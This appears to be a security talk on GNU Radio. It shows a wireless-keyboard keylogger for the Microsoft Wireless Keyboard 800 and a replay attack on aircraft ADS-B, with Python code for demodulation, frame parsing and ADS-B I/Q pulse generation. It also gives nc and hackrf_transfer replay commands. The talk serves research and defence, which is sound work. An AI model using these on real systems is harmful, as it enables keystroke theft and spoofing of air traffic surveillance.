We are in the IoT era. In this session the functions of GNU Radio are introduced with demonstrations. GNU Radio is an SDR (Software Defined Radio) tool that can be used to analyze wireless security, for example of Bluetooth LE. As examples of SDR usage, I demonstrate a replay attack against the RF signal of ADS-B (Automatic Dependent Surveillance-Broadcast) transmitted by aircraft, and a sniffer for wireless keyboards. Ideas for countermeasures are also discussed.
2. Agenda
Circumstances
In the IoT (Internet of Things) era
• Key topic: wireless security
• To analyze wireless security, SDR (Software Defined Radio) technology is effective
Introduce GNU Radio, an SDR tool
• A powerful tool for testing wireless security
• Easily available, works with inexpensive peripheral hardware
Wireless security testing with attacks
• Attack #1: key logging of a wireless keyboard
• Attack #2: replay attack on ADS-B
3. Recent publications on wireless security
Abuse/falsification of software and firmware
• Drone attack by malware and network
• http://www.slideshare.net/codeblue_jp/cb14-dongcheol-hongja/
RF-signal-level interception/injection
• Spread Spectrum Satcom Hacking: Attacking the Globalstar Simplex Data Service (Moore, Black Hat USA 2015)
• https://www.blackhat.com/docs/us-15/materials/us-15-Moore-Spread-Spectrum-Satcom-Hacking-Attacking-The-GlobalStar-Simplex-Data-Service.pdf
• Low-cost GPS simulator – GPS spoofing by SDR (Lin Huang, Qing Yang, DEF CON 23)
• https://media.defcon.org/DEF%20CON%2023/DEF%20CON%2023%20presentations/Lin%20Huang%20&%20Qing%20Yang/DEFCON-23-Lin-Huang-Qing-Yang-GPS-Spoofing.pdf
4. About GNU Radio
In 2001, Eric Blossom (US) started GNU Radio, a free and open-source software development toolkit for software radio.
Multi-platform (Linux/FreeBSD/OS X/Windows)
Runs on an ordinary personal computer (cf. many software radio implementations run on an FPGA in dedicated hardware)
Flow graphs are built in the GNU Radio Companion GUI: flow graph -> XML (.grc) file -> generated Python script -> C++ signal-processing blocks
License: GPL version 3
http://gnuradio.org/redmine/projects/gnuradio/wiki
5. GNU Radio components
Elements of a flow graph: Source -> Block -> Sink
• Source (input): software or hardware
• Block (processing): software, written in Python or C++
• Sink (output): software or hardware
8. Sinks
Software
• Scope, FFT, waterfall, histogram, constellation plot
• Files, others
Hardware
• PC audio
• Other peripheral hardware: HackRF, BladeRF, USRP, etc.
9. Peripheral hardware (e.g.)
                          RTL-SDR    HackRF        BladeRF     USRP
Frequency range [MHz]     24-1800    1-6000        300-3800    70-6000
A/D converter [bits]      8          8             12          12
Bandwidth [MHz]           2.8        20            28          56
Transmit / Receive        RX only    TX or RX      TX & RX     TX & RX
                                     (half duplex) (full duplex)
Price                     $20        $300          $420        $675
11. VHF receiver
A VHF receiver composed of an RTL-SDR dongle and GNU Radio (figure)
12. ISM 2.4GHz band
WiFi/Bluetooth frequency allocation
http://www.digikey.com/es/articles/techzone/2013/jun/shaping-the-wireless-future-with-low-energy-applications-and-systems
14. Attacking wireless devices
Survey the attack target
• Search the FCC ID on the FCC site
• Photos: has someone else already posted a teardown?
• Take the device apart yourself
Necessary information
• RF chip datasheet: frequency band, modulation, transmission speed, data format
Observe and analyze the signal
16. How to monitor and analyze the signal
Receive the radio waves
• Check the signal: GNU Radio, SDR#
• Write the received signal to a file: GNU Radio, rtl_sdr
Analyze
• Monitor the waveform in detail: baudline
• Cut out the region you need (select the region and write it to a file): baudline
• Demodulate: GNU Radio or in-house scripts
• Decode / parse / decrypt
  - Convert to bits (0/1) (a hex dump of the raw samples is unreadable)
  - Find the characteristic bit pattern
17. Signal monitoring tool
Baudline
Baudline is a time-frequency visualization and signal analysis tool
Requirements
• Linux (x86_64, PowerPC)
• Mac OS X
• Solaris SPARC
Select a region of the signal and write it to a file
http://www.baudline.com/index.html
19. Attack demo #1
Keylogger for the Microsoft Wireless Keyboard 800
At first, I tried to reproduce "keysweeper" (*1)
It did not work against the Japanese edition of the MS Wireless Keyboard 800
This demo shows the process of investigating the cause with GNU Radio and getting it to work
(*1) https://github.com/samyk/keysweeper
20. Keylogger for wireless keyboards
27MHz band
• Easy to snoop on because it is (in)secure
• Sales ended in the 2000s
2.4GHz band
• Same frequencies as Bluetooth/WiFi
• Is the Bluetooth specification secure?
• What about keyboards using a proprietary specification?
21. Related projects
Travis Goodspeed, 2010
• The GoodFET is an open-source JTAG adapter, loosely based upon the TI MSP430 FET UIF and EZ430U boards
• http://goodfet.sourceforge.net/
KeyKeriki project (CanSecWest 2010)
• Developed a device with an ARM Cortex MCU and a radio module that can sniff keyboards and execute commands remotely
• http://www.remote-exploit.org/articles/keykeriki_v2_0__8211_2_4ghz/index.html
Keysweeper (January 2015)
• Made the process efficient and systematic
• Focuses on the fixed byte 0xCD in the device address
• Embedded in a USB charger, logs to EEPROM
• Detects keywords and sends an SMS via a mobile module
• Forwards keystrokes to another device in real time, etc.
• https://github.com/samyk/keysweeper
22. Experiment on a breadboard
Sniffer hardware: Arduino Nano + nRF24L01, connected over USB to a control PC
Target: Microsoft Wireless Keyboard 800
Arduino program (about 1500 lines):
• Scan 2403-2480MHz in 1MHz steps
• Inspect 1 byte (=0xCD) of the device ID
• If the next 2 bytes are (0x0A38 | 0x0A78), stop scanning and start logging
nRF24L01
• 2.4GHz ISM band
• GFSK modulation
• 1Mbps or 2Mbps
23. Success?
Radio setup
End radio setup
scan
Tuning to 2480
Potential keyboard: AA AA 5A A9 CD 27 55 49
Tuning to 2403
Tuning to 2404
Potential keyboard: E4 AA AA A5 CD 55 A5 5A
Tuning to 2405
Tuning to 2406
Tuning to 2407
Tuning to 2408
…………………
No!
29. KeyKeriki project results
• The Microsoft Wireless Keyboard 800's device address is 5 bytes starting with 0xCD
• Keystrokes are encrypted by a simple XOR with this device address
http://www.remote-exploit.org/content/keykeriki_v2_cansec_v1.1.pdf
30. Get the bit sequence
Decision rule on the FM-demodulated output Vfm: bit = Vfm > 0 ? 0 : 1
111111111111001100010000000000100110111110111111111111111111111111
111111111110010101010101010010011001111100101000101101100111001000
000000001010011110000001110100000001010011100001110110100110001100
111010100111101110000010001110010100110011100111001110011100011110
111110100111000111111111111100110010000000000001111111011111111111
111101111111101111111111111111111111111111111001010101010101001001
100111110010100010110110011100100000000000101001111000000111010000
000101001110000111011010011000110011101010011110111000001000111001
010011001110101001110011100111000111101111101001110101111111111100
110000001000100010001111111111111111111111111011111111111111111111
101010101001011001111100101000101101100111001000000000001010011110
000001110100000001010011100001110110100110001100111010100111101110
000010001110
……….
Find "0x0A78" (0000101001111000) in the bit stream
Frame layout: preamble 8 bits + address 5 bytes + packet control field 9 bits + payload
The packet control field is 9 bits; the 0x0A78 word sits at the start of the payload and marks the device ID frame
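The slicing rule above is the last step of the GNU Radio receive chain: a quadrature (FM) demodulator turns the GFSK signal into a voltage proportional to instantaneous frequency, and the sign of that voltage at each bit centre is the bit. The following added example (not the author's GNU Radio flow graph, and not keysweeper code) reproduces that chain in pure Python so the rule can be exercised offline: it synthesises a constant-envelope 2-FSK signal for the preamble and address bits read off the bit dump above, adds a little noise, runs the same discriminator GNU Radio's Quadrature Demod block computes, and slices with bit = Vfm > 0 ? 0 : 1. The sample rate, deviation, noise level and the polarity (a '1' below the centre frequency) are constructed assumptions; the Gaussian pulse shaping of real GFSK is omitted.

```python
import cmath
import math
import random

# Constructed parameters (assumptions, not taken from the slides): 2 samples per
# bit and a frequency deviation of 1/8 cycle per sample. The real nRF24L01 signal
# is GFSK at 1 or 2 Mbps; the Gaussian pulse shaping is omitted here.
SAMPLES_PER_BIT = 2
DEVIATION = 0.125   # cycles per sample
NOISE_SIGMA = 0.05  # complex AWGN added to the constructed capture

# Preamble (0xAA) and 5-byte address bits as read off the slide's bit dump.
SLIDE_ADDR_BITS = "101010101010100100110011111001010001011011001110"


def fsk_modulate(bits, seed=1):
    """Constant-envelope 2-FSK with continuous phase. A '1' is sent below the
    centre frequency and a '0' above it, which is the polarity the slide's rule
    bit = (Vfm > 0) ? 0 : 1 implies for this capture (assumed)."""
    rng = random.Random(seed)
    phase = 0.0
    iq = []
    for b in bits:
        freq = -DEVIATION if b == "1" else DEVIATION
        for _ in range(SAMPLES_PER_BIT):
            phase += 2 * math.pi * freq
            noise = complex(rng.gauss(0, NOISE_SIGMA), rng.gauss(0, NOISE_SIGMA))
            iq.append(cmath.exp(1j * phase) + noise)
    return iq


def quadrature_demod(iq):
    """FM discriminator, the same operation as GNU Radio's Quadrature Demod
    block: Vfm[n] = arg(x[n] * conj(x[n-1])), proportional to frequency."""
    vfm = [0.0]
    for prev, cur in zip(iq, iq[1:]):
        vfm.append(cmath.phase(cur * prev.conjugate()))
    return vfm


def slice_bits(vfm):
    """Sample Vfm once per bit (at the bit centre) and apply the slide's rule."""
    out = []
    for i in range(len(vfm) // SAMPLES_PER_BIT):
        v = vfm[i * SAMPLES_PER_BIT + SAMPLES_PER_BIT // 2]
        out.append("0" if v > 0 else "1")
    return "".join(out)


def bits_to_hex(bits):
    return "".join("%02x" % int(bits[i:i + 8], 2) for i in range(0, len(bits) - 7, 8))


def demo():
    """Round trip: bits -> FSK I/Q -> discriminator -> sliced bits -> hex."""
    recovered = slice_bits(quadrature_demod(fsk_modulate(SLIDE_ADDR_BITS)))
    return recovered, bits_to_hex(recovered)


if __name__ == "__main__":
    bits, hexstr = demo()
    print(bits)
    print(hexstr)  # AA A9 33 E5 16 CE: preamble + the keyboard's 5-byte address
```

With a real capture the I/Q samples come from the file written by GNU Radio or rtl_sdr instead of fsk_modulate(); if the recovered bytes come out as the bitwise complement of the expected preamble, the receiver's spectrum is inverted and the comparison in slice_bits() simply flips.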
31. Device ID detection
{ P.A. }  { [p0] [p1] [p2] [p3] [p4] }
AA        A9 33 E5 16 CE
10101010  10101001 00110011 11100101 00010110 11001110
{ PktCTL bits } { 0A 78 1D 01 ... }
010000000 00001010 01111000 00011101 00000001
{ payload ....... }
0100111000011101101001100011001110101001111011100……
The last address byte p[4] is the DEVICE ID byte that keysweeper tests:
  // From keysweeper_mcu_src https://github.com/samyk/keysweeper
  if (radio.available())
  {
    radio.read(&p, PKT_SIZE);
    if (p[4] == 0xCD) // DEVICE ID byte; 0xCD -> 0xCE for the Japanese KBD
    {
      sp("Potential keyboard: ");
      ...
    }
  }
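The frame breakdown above and the "find 0x0A78" step on the previous slide are a parser in all but name. The following added example (my code, not keysweeper's nor the author's) walks the bit dump from slide 30: it locates the 0x0A78 word, steps back over the 8-bit preamble, 5-byte address and 9-bit packet control field to the frame boundary, and splits the Enhanced ShockBurst frame into preamble, address, payload length, PID, NO_ACK, payload and the trailing 16-bit CRC. The device ID byte is the last address byte, which is where the 0xCD/0xCE check lands. The CRC routine follows the nRF24L01 datasheet (x^16+x^12+x^5+1, initial value 0xFFFF, computed over address, packet control field and payload); it is verified here against the standard CRC-16/CCITT-FALSE check value, and whether this particular capture's trailing 0xFA71 matches is left for the reader to run. The 5-byte address length is taken from the KeyKeriki result on slide 29.

```python
# Bit dump copied from slide 30 (demodulated nRF24L01 capture); runs of '1' are idle.
SLIDE_BITS = (
    "111111111111001100010000000000100110111110111111111111111111111111"
    "111111111110010101010101010010011001111100101000101101100111001000"
    "000000001010011110000001110100000001010011100001110110100110001100"
    "111010100111101110000010001110010100110011100111001110011100011110"
    "111110100111000111111111111100110010000000000001111111011111111111"
)

PREAMBLE_BITS = 8
ADDR_BITS = 40       # 5-byte address, as KeyKeriki found for this keyboard
PCF_BITS = 9         # 6-bit payload length, 2-bit PID, 1-bit NO_ACK
HEADER_BITS = PREAMBLE_BITS + ADDR_BITS + PCF_BITS


def bits_to_bytes(bits):
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits) - 7, 8))


def crc16_esb(bits):
    """nRF24L01 packet CRC: x^16+x^12+x^5+1, init 0xFFFF, over the raw bit
    string of address + PCF + payload (the 9-bit PCF makes it non byte-aligned)."""
    crc = 0xFFFF
    for b in bits:
        crc ^= int(b) << 15
        crc = ((crc << 1) ^ 0x1021) & 0xFFFF if crc & 0x8000 else (crc << 1) & 0xFFFF
    return crc


def parse_frame(bits, start):
    """Split one Enhanced ShockBurst frame whose preamble begins at `start`."""
    pos = start
    preamble = bits[pos:pos + PREAMBLE_BITS]
    pos += PREAMBLE_BITS
    address = bits_to_bytes(bits[pos:pos + ADDR_BITS])
    pos += ADDR_BITS
    pcf = bits[pos:pos + PCF_BITS]
    pos += PCF_BITS
    length = int(pcf[:6], 2)
    payload = bits_to_bytes(bits[pos:pos + 8 * length])
    pos += 8 * length
    crc_rx = int(bits[pos:pos + 16], 2)
    crc_calc = crc16_esb(bits[start + PREAMBLE_BITS:pos])
    return {
        "preamble": preamble,
        "address": address.hex(),
        "length": length,
        "pid": int(pcf[6:8], 2),
        "no_ack": int(pcf[8]),
        "payload": payload.hex(),
        "crc_rx": "%04x" % crc_rx,
        "crc_ok": crc_rx == crc_calc,
        "device_id_byte": address[-1],  # keysweeper's p[4]: 0xCD, or 0xCE for the JP edition
    }


def find_frames(bits, marker=0x0A78):
    """The slide's method: find the fixed 0x0A78 word at the start of the payload,
    then walk back over preamble, address and PCF to the frame boundary."""
    marker_bits = format(marker, "016b")
    frames = []
    i = bits.find(marker_bits)
    while i != -1:
        start = i - HEADER_BITS
        if start >= 0 and bits[start:start + PREAMBLE_BITS] in ("10101010", "01010101"):
            frames.append(parse_frame(bits, start))
        i = bits.find(marker_bits, i + 1)
    return frames


if __name__ == "__main__":
    for frame in find_frames(SLIDE_BITS):
        for key, value in frame.items():
            print("%-15s %s" % (key, value if key != "device_id_byte" else "0x%02X" % value))
```

For a stream from GNU Radio the bit string is produced by the slicer on the previous slide; the marker search is what lets the sniffer lock on without knowing the address in advance, after which the recovered 5-byte address can be programmed into the nRF24L01 for normal, CRC-checked reception.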
34. Summary #1
Using GNU Radio, I found the device address KEY byte (0xCE) of the Japanese edition of the Microsoft Wireless Keyboard 800
After changing the device address KEY to 0xCE, the keylogger works; its behavior can then be monitored
Don't use a wireless keyboard when working with sensitive information. Be especially wary of devices using a proprietary specification.
Caution
When experimenting in Japan, transmission from the nRF24L must be disabled:
• boolean shoutKeystrokes = true; -> false;
35. Attack demo #2
Replay attack on ADS-B (*1) transmitted by aircraft
• Aviation is part of the critical infrastructure
• ADS-B is the next-generation air traffic surveillance system
• Attack demos were shown at Black Hat 2012, DEF CON 20, etc.
• Using SDR technology, I tried to reproduce the attack
(*1) Automatic Dependent Surveillance–Broadcast
37. ADS-B overview
Because the positional accuracy of old radar was 1-2 NM, separation intervals had to be wide to ensure safe operation. To keep up with growing traffic a new system was needed. ADS-B, which uses GPS to provide highly accurate position information, was developed as the next-generation air traffic surveillance system during the 1980s-1990s.
Now about 70% of passenger aircraft have ADS-B (source: http://www.flightradar24.com/how-it-works)
Equipment is required by 2017 in Europe and by 2020 in the United States
Points at issue
• No encryption
• Broadcast with no authentication
• Simple encoding and simple modulation scheme
38. Mechanism of ADS-B
ADS-B: Automatic Dependent Surveillance–Broadcast
Using a broadcast datalink, the aircraft transmits its own location, speed, altitude and so on, obtained from measurement systems such as GPS.
Image: http://www.enri.go.jp/news/osirase/pdf/e_navi10.pdf (GPS location -> aircraft -> broadcast datalink -> ground receiving station -> control center)
39. Papers related to ADS-B
About vulnerabilities
• Donald L. McCallie, Major, USAF (2011)
  http://apps.fcc.gov/ecfs/document/view.action?id=7021694523
• Andrei Costin, Aurélien Francillon, Black Hat 2012
  https://media.blackhat.com/bh-us-12/Briefings/Costin/BH_US_12_Costin_Ghosts_In_Air_Slides.pdf
• Brad Haines (RenderMan), DEF CON 20 (2012)
  http://korben.info/wp-content/uploads/defcon/SpeakerPresentations/Renderman/DEFCON-20-RenderMan-Hackers-plus-Airplanes.pdf
• Hugo Teso, CyCon 2013
  https://ccdcoe.org/cycon-2013.html
About countermeasures
• Martin Strohmeier, Ivan Martinovic (2014), Detecting False-Data Injection Attacks on Air Traffic Control Protocols
  http://www.cs.ox.ac.uk/files/6604/wisec2014-abstract.pdf
• Kyle D. Wesson, Brian L. Evans et al. (2014), Can Cryptography Secure Next Generation Air Traffic Surveillance?
  https://radionavlab.ae.utexas.edu/images/stories/files/papers/adsb_for_submission.pdf
• Seoung-Hyeon Lee, Yong-Kyun Kim, Deok-Gyu Lee et al. (2014), Protection Method for Data Communication between ADS-B Sensor and Next-Generation Air Traffic Control Systems
  http://www.mdpi.com/2078-2489/5/4/622
41. How to receive ADS-B?
Receive the radio waves
• A USB stick sold for receiving overseas digital TV (RTL-SDR), about 1000 to 2000 JPY
Process the signal and display it
• PC: Windows, Mac, Linux
• Smartphone, tablet
44. ADS-B format
Format and actually received I/Q signals (figure)
https://media.defcon.org/DEF%20CON%2020/DEF%20CON%2020%20slides/DEF%20CON%2020%20Hacking%20Conference%20Presentation%20By%20RenderMan%20-%20Hacker%20and%20Airplanes%20No%20Good%20Can%20Come%20Of%20This%20-%20Slides.m4v
46. Received ADS-B (e.g.)
*8d7583a5585b575a9ebc4bbb3f04;
CRC: 000000 (ok)
DF 17: ADS-B message.
Capability : 5 (Level 2+3+4 )
ICAO Address : 7583a5
Extended Squitter Type: 11
Extended Squitter Sub : 0
Extended Squitter Name: Airborne Position …….
F flag : odd
T flag : non-UTC
Altitude : 17125 feet
………….
Processing chain: I/Q signal after A/D conversion -> demodulation / decode -> raw data in hex -> parse the data -> aircraft location data, etc.
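The dump above is what the decoder prints after the "demodulation / decode -> raw data in hex -> parse" chain. The following added example (my code, not dump1090 or the author's tooling) implements the parse step for that exact line: it strips the '*' and ';' wrapper, checks the Mode S CRC-24 (generator 0x1FFF409; for DF17 the parity is not XORed with an address, so an intact frame leaves a remainder of 0, which is the "CRC: 000000 (ok)" in the dump), and extracts DF, capability, ICAO address, type code and, for an airborne position, the 12-bit altitude with Q bit, the T (UTC sync) and F (CPR odd/even) flags and the raw CPR latitude/longitude. The type-code names are a subset of the DF17 extended squitter table; Gillham-coded altitudes (Q=0) and the even/odd CPR position calculation are omitted.

```python
MODES_GEN = 0x1FFF409   # Mode S CRC-24 generator polynomial (degree 24)

# Frame from slide 46 as dump1090 prints it: '*' + 28 hex digits (112 bits) + ';'
SLIDE_LINE = "*8d7583a5585b575a9ebc4bbb3f04;"


def strip_avr(line):
    """'*<hex>;' -> '<hex>'"""
    return line.strip().lstrip("*").rstrip(";")


def modes_crc(msg_hex):
    """CRC-24 over the whole frame. For DF17 the 24-bit parity is not XORed with
    an address, so an intact frame yields 0 (dump1090's 'CRC: 000000 (ok)')."""
    rem = 0
    for byte in bytes.fromhex(msg_hex):
        rem ^= byte << 16
        for _ in range(8):
            rem <<= 1
            if rem & 0x1000000:
                rem ^= MODES_GEN
    return rem


def typecode_name(tc):
    if 1 <= tc <= 4:
        return "Aircraft Identification"
    if 5 <= tc <= 8:
        return "Surface Position"
    if 9 <= tc <= 18:
        return "Airborne Position (Baro Altitude)"
    if tc == 19:
        return "Airborne Velocity"
    if 20 <= tc <= 22:
        return "Airborne Position (GNSS Height)"
    return "Other / reserved"


def decode_altitude(ac12):
    """12-bit altitude field. With the Q bit set the remaining 11 bits count
    25 ft steps from -1000 ft; Gillham coding (Q clear) is not handled here."""
    if not ac12 & 0x10:
        return None
    n = ((ac12 & 0xFE0) >> 1) | (ac12 & 0x0F)
    return n * 25 - 1000


def decode_df17(msg_hex):
    """Parse a 112-bit DF17 extended squitter into its fields."""
    b = bytes.fromhex(msg_hex)
    if len(b) != 14:
        raise ValueError("expected a 112-bit frame (28 hex digits)")
    me = int.from_bytes(b[4:11], "big")   # 56-bit ME field
    tc = me >> 51
    out = {
        "df": b[0] >> 3,
        "ca": b[0] & 0x7,
        "icao": b[1:4].hex(),
        "tc": tc,
        "name": typecode_name(tc),
        "crc_ok": modes_crc(msg_hex) == 0,
    }
    if 9 <= tc <= 18:   # airborne position, barometric altitude
        out.update({
            "surveillance_status": (me >> 49) & 0x3,
            "altitude_ft": decode_altitude((me >> 36) & 0xFFF),
            "utc_sync": bool((me >> 35) & 1),   # T flag
            "cpr_odd": bool((me >> 34) & 1),    # F flag: odd/even CPR frame
            "cpr_lat": (me >> 17) & 0x1FFFF,
            "cpr_lon": me & 0x1FFFF,
        })
    return out


if __name__ == "__main__":
    for key, value in decode_df17(strip_avr(SLIDE_LINE)).items():
        print("%-20s %s" % (key, value))
```

The same parser runs over the "*...;" lines of a raw capture file (as used in the replay on the next slides), and the CRC check is the one thing the receiving side can verify: it proves the frame is well-formed, not that it came from an aircraft.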
47. Attack vectors
Image: http://www.mlit.go.jp/koku/koku_fr14_000007.html
Aircraft (position from GPS satellite) -> ADS-B broadcast -> ADS-B receiving stations -> IP network -> control center
V1: injection into the IP network behind the receiving stations
V2: injection on the RF channel (false ADS-B broadcast)
V3: third vector marked on the figure
48. Replay attack (V1)
Intercepted raw data (file name: xxxx.raw)
Inject the raw data via the IP network:
$ cat xxxx.raw | nc target_IP target_PORT
※ In reality, the adversary needs to find a way past the authentication in order to connect to the target server.
*8d869210581fe3bf4350dfd62439;
*5da40455385715;
*8d86dca29914ee0f20f410ef2595;
*8d780c3c581db79c18a4b0ffc872;
*8d867f609914b993e8700ba91251;
*02a1839b9e229d;
*……………
49. Replay attack (V2)
Create an ADS-B pulse signal file from the raw data (adsb-pulsegen script):
$ cat xxxx.raw | ./adsb-pulsegen test_file.bin
Use the file to generate the modulated RF signal (hackrf_transfer takes the frequency and sample rate in Hz; -t transmits the 8-bit I/Q file, -x 0 sets the TX VGA gain to 0 dB):
$ hackrf_transfer -f 1090000000 -s 2000000 -t test_file.bin -x 0
*8d869210581fe3bf4350dfd62439;
*5da40455385715;
*8d86dca29914ee0f20f410ef2595;
*8d780c3c581db79c18a4b0ffc872;
*8d867f609914b993e8700ba91251;
*02a1839b9e229d;
*0261819c1d1e5a;
……………
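The "simple encoding and simple modulation scheme" noted on slide 37 is what makes the pulse-generation step above so short. The following added example (my code, not the author's adsb-pulsegen) shows what such a generator does: it takes a frame in the "*...;" raw format, builds the Mode S pulse-position waveform (preamble pulses at 0, 1.0, 3.5 and 4.5 µs, then one 1 µs slot per bit with the 0.5 µs pulse in the first half for a '1' and the second half for a '0'), and writes it as the interleaved signed 8-bit I/Q samples hackrf_transfer reads, at the 2 MS/s the slide uses so one sample is one 0.5 µs chip. It also contains the matching receiver (preamble correlation and per-bit energy comparison) so the round trip can be checked offline without any radio. The pulse amplitude and the silence padding are constructed choices; transmitting on 1090 MHz is illegal without authorisation, and this code is only meant to be run against the file it writes.

```python
SAMPLE_RATE = 2_000_000   # hackrf_transfer -s 2000000: one sample per 0.5 us chip
AMPLITUDE = 127           # full-scale signed 8-bit I (constructed choice)
CHIPS_PER_BIT = 2
# Mode S preamble as 0.5 us chips: pulses at 0, 1.0, 3.5 and 4.5 us, data starts at 8 us
PREAMBLE_CHIPS = [1, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0]

# Frame from slide 46 in the raw "*<hex>;" format used by the replay scripts
SLIDE_LINE = "*8d7583a5585b575a9ebc4bbb3f04;"


def strip_avr(line):
    return line.strip().lstrip("*").rstrip(";")


def hex_to_bits(msg_hex):
    return bin(int(msg_hex, 16))[2:].zfill(len(msg_hex) * 4)


def to_chips(msg_hex):
    """Pulse-position modulation: '1' -> pulse then gap, '0' -> gap then pulse."""
    chips = list(PREAMBLE_CHIPS)
    for b in hex_to_bits(msg_hex):
        chips += [1, 0] if b == "1" else [0, 1]
    return chips


def to_iq8(msg_hex, silence_chips=40):
    """Interleaved signed 8-bit I/Q, hackrf_transfer's file format. The pulses are
    on-off keyed at baseband DC; the HackRF tuner moves them to 1090 MHz."""
    chips = [0] * silence_chips + to_chips(msg_hex) + [0] * silence_chips
    out = bytearray()
    for c in chips:
        out.append(AMPLITUDE if c else 0)   # I
        out.append(0)                       # Q
    return bytes(out)


def iq8_to_magnitude(data):
    """Receiver front end: signed 8-bit I/Q pairs -> magnitude per sample."""
    mags = []
    for k in range(0, len(data) - 1, 2):
        i_s = data[k] - 256 if data[k] > 127 else data[k]
        q_s = data[k + 1] - 256 if data[k + 1] > 127 else data[k + 1]
        mags.append((i_s * i_s + q_s * q_s) ** 0.5)
    return mags


def demodulate(mag, nbits=112):
    """Find the preamble by correlating against its chip pattern, then decide each
    bit by comparing the energy in its two chips. Returns the frame as hex."""
    best, best_score = None, 0.0
    span = len(PREAMBLE_CHIPS) + CHIPS_PER_BIT * nbits
    for start in range(len(mag) - span + 1):
        score = sum(mag[start + k] if c else -mag[start + k]
                    for k, c in enumerate(PREAMBLE_CHIPS))
        if score > best_score:
            best, best_score = start, score
    if best is None:
        return None
    pos = best + len(PREAMBLE_CHIPS)
    bits = []
    for _ in range(nbits):
        bits.append("1" if mag[pos] > mag[pos + 1] else "0")
        pos += CHIPS_PER_BIT
    return "%0*x" % (nbits // 4, int("".join(bits), 2))


def round_trip(line):
    """Encode a raw-format line to I/Q and decode it again; returns the hex frame."""
    return demodulate(iq8_to_magnitude(to_iq8(strip_avr(line))))


if __name__ == "__main__":
    with open("test_file.bin", "wb") as fh:
        fh.write(to_iq8(strip_avr(SLIDE_LINE)))
    print(round_trip(SLIDE_LINE))
```

A 112-bit frame occupies 120 µs, i.e. 240 samples at 2 MS/s; the transmit side is no more than a lookup from bits to chips, which is the whole point of the "simple modulation" issue. The receive half is the same comparison a dump1090-style decoder performs, and it accepts any well-formed frame regardless of who transmitted it.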
50. DEMO
Injection via the IP network (V1)
• Real-time interception of the ADS-B signal and display on a map
• Inject raw data received in the past
Injection via the RF channel (V2)
• Generate an I/Q signal file from the received raw data
• Inject the RF signal modulated with the I/Q file
53. Security of air traffic control?
Why doesn't it get renewed?
• The threat is not recognized
• Safety and interoperability must be preserved
• International discussion takes a long time: forming consensus, development, deployment
Existing radio-based systems: ASR/SSR, ILS (glide slope / localizer), VOR/DME
Images: http://www.jatcaonline.com/SSR_system.JPG, https://upload.wikimedia.org/wikipedia/commons/f/fe/D-VOR_PEK.JPG
54. Summary #2
Technically, an attack against ADS-B is extremely easy
Not only ADS-B but any air traffic control system that relies on radio waves is vulnerable to jamming
Possible attack scenarios
• Terrorists or nation-state actors inject false flight paths or jam the signal to confuse air traffic control as one step towards an objective
Is it hard to implement early countermeasures? (An international consensus is required)
Mitigations such as detecting injection or using tracking algorithms must be considered
Create an environment that supports virtual training and an incident response plan
55. Conclusion
With the emergence of the software defined radio toolkit GNU Radio and low-cost RF hardware, the technical threshold for carrying out an RF attack has been lowered
Existing systems that rely on radio waves, such as air traffic control, have not kept pace with the modernization that commercial technology like WiFi or smartphones has gone through
A fundamental countermeasure will take a long time
Compensating for the lack of countermeasures with operational practice requires an enhanced incident response plan and training